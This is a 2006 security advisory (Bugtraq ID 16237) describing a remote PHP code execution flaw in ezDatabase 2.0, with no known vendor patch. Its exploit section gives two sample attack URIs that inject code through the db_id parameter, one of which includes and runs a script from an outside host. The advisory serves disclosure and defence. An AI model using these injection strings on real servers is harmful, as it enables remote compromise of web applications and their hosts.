EZDatabaseRemote PHP Script Code Execution Vulnerability
BID:16237
Info
EZDatabaseRemote PHP Script Code Execution Vulnerability
| Bugtraq ID: | 16237 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 14 2006 12:00AM |
| Updated: | Jan 14 2006 12:00AM |
| Credit: | rakstija r0t3d3Vil is credited with the discovery of this issue. |
| Vulnerable: |
IndexCOR ezDatabase 2.0 |
| Not Vulnerable: | |
Discussion
EZDatabaseRemote PHP Script Code Execution Vulnerability
ezDatabase is prone to a remote PHP script code execution vulnerability.
An attacker can exploit this issue to execute arbitrary malicious PHP code and execute it in the context of the Web server process. These may facilitate a compromise of the application and the underlying system; other attacks are also possible.
ezDatabase version 2.0 is vulnerable to these issues; other versions may also be affected.
ezDatabase is prone to a remote PHP script code execution vulnerability.
An attacker can exploit this issue to execute arbitrary malicious PHP code and execute it in the context of the Web server process. These may facilitate a compromise of the application and the underlying system; other attacks are also possible.
ezDatabase version 2.0 is vulnerable to these issues; other versions may also be affected.
Exploit / POC
EZDatabaseRemote PHP Script Code Execution Vulnerability
No exploit is required.
Sample URIs have been provided:
http://www.example.com/visitorupload.php?db_id=;phpinfo()
http://www.example.com/visitorupload.php?db_id=;include(_GET[test])&test=http://www.example2.com/script.php
No exploit is required.
Sample URIs have been provided:
http://www.example.com/visitorupload.php?db_id=;phpinfo()
http://www.example.com/visitorupload.php?db_id=;include(_GET[test])&test=http://www.example2.com/script.php
Solution / Fix
EZDatabaseRemote PHP Script Code Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
EZDatabaseRemote PHP Script Code Execution Vulnerability
References:
References:
- ezDatabase 2.0 and below (rakstija r0t3d3Vil)
- ezDatabase Homepage (IndexCOR)